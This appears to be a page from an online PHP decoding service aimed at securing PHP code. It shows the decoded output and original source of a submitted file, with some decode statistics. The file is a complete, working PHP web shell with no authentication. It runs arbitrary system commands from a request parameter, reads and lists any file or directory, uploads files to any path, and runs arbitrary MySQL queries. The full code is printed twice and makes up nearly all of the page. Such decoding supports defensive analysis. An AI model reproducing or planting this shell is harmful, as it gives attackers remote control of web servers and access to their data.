Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? ob_implicit_flush(); if(isset($_REQUEST['f'])){ $filename=$_REQUEST['f']; ..
Decoded Output download
<?
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir
";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>
";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir"> <input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http:
<br>for example:
http:
or http:
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http:
Did this file decode correctly?
Original Code
<?
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir"> <input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http:
<br>for example:
http:
or http:
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http:
Function Calls
ob_implicit_flush | 1 |
Stats
MD5 | c8ee30f9ce27b29f4096022d2047ce49 |
Eval Count | 0 |
Decode Time | 136 ms |